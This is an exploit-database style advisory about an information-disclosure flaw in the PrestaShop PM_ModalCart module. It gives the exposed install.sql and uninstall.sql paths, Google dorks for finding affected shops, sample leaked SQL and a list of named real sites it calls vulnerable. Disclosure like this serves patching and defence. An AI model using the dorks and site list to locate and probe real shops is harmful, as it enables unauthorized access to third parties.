PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

################################################################################################# # Exploit Title : PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/01/2019 # Vendor Homepage : prestashop.com # Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html + prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/ # Software Price : 40$ # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4± # Exploit Risk : Medium # Google Dorks : inurl:''/modules/pm_modalcart/'' intext:''©2018 Recettes & Cabas | Tous droits réservés'' intext:''Agence de communication - Une réalisation Communikey'' intext:''cron module by samdha.net'' intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150906/PrestaShop-PM_ModalCart-1.6.1.4-Database-Disclosure.html ################################################################################################# # Exploit : /modules/pm_modalcart/install.sql /modules/pm_modalcart/uninstall.sql ################################################################################################# # Example SQL Database Information Exposure => install.sql => INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove', 'Modalcart above', 'On modal, above the product added to cart', 1); INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow', 'Modalcart below', 'On modal, below the product added to cart', 1); uninstall.sql DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove'; DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow'; ################################################################################################# # Example Vulnerable Sites => [+] recettesetcabas.com/modules/pm_modalcart/install.sql [+] boutique-solidaire.com/modules/pm_modalcart/install.sql [+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql [+] kakicrazy.fr/modules/pm_modalcart/install.sql [+] visuashop.fr/modules/pm_modalcart/install.sql [+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql [+] km-justering.dk/modules/pm_modalcart/install.sql [+] securedirect.dk/modules/pm_modalcart/install.sql [+] griffin.ch/modules/pm_modalcart/uninstall.sql ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top